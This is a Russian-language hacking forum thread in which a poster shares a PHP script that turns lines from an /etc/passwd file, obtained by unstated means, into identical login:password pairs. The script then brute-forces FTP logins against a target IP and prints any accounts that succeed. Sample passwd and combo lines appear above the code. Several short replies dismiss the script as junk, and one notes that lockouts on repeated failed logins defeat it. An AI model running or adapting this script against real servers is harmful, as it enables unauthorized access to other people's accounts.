Сообщений в теме: 5

[БЗыг]

Описание:
Удаленный перебор пароля к фтп по одинаковому логину и паролю.
Фаил passwd.txt содержит записи вида (/etc/passwd):

root:x:0:0:root:/root:/bin/bash
valence:x:603:608::/home/valence:/bin/bash
distprom:x:604:609::/home/distprom:/bin/bash

Неважно как вы его получили )

Регулярным выражением собераем фаил combo.txt вида:

root:root
mysql:mysql
admin:admin
easyagnt:easyagnt
cpanel:cpanel
mailman:mailman
postgres:postgres
photop:photop
active:active

Сопственно сам скиптик:
<?

$filepass = "./passwd.txt";
$str = file($filepass);
$num = count($str);
for($i=0;$i<$num;$i++)
{
if(ereg("^([[:alnum:]]+):x:[^<>]+bash",$str[$i],$login[]))
{
$lp = $login[$i][1].":".$login[$i][1]."\r\n";
$f = fopen("combo.txt","a+");
fputs($f,$lp);
fclose($f);
}
}
$ip= "192.168.0.1";
$combo_file = "./combo.txt";
set_time_limit(0);
$combo_data = file($combo_file);
$num =count($combo_data);

for($i=0;$i<$num;$i++){
flush();
list($login[$i],$passwd[$i]) = split(':',$combo_data[$i]);
$conn_id = ftp_connect($ip);
if (!$conn_id) {
echo "FTP connection has failed!";
echo "Attempted to connect to $ip";die;
}
else {
echo"Coneccting to".$ip.".............";
if(@ftp_login ($conn_id,$login[$i],$passwd[$i])){
echo"[230]Login: ".$login[$i]." Passwd: ".$login[$i]."<br>";
ftp_close($conn_id);

}
else{

echo"bad.<br>";
}

}
}
if (filesize($combo_file)>0){
$f = fopen($combo_file,"w");
ftruncate($f,0);
fclose($f);
}
?>

Жду коментоф...

[----]

лажа, без обид.

[БЗыг]

Бу!

[Вини]

Конечно - самый умный способ взлома это брут.

[Cool_GI]

Туфта!

[kornel]

Конечно - самый умный способ взлома это брут.

Особенно, если стоит ограничение на количество не удачных логинов с 1 адреса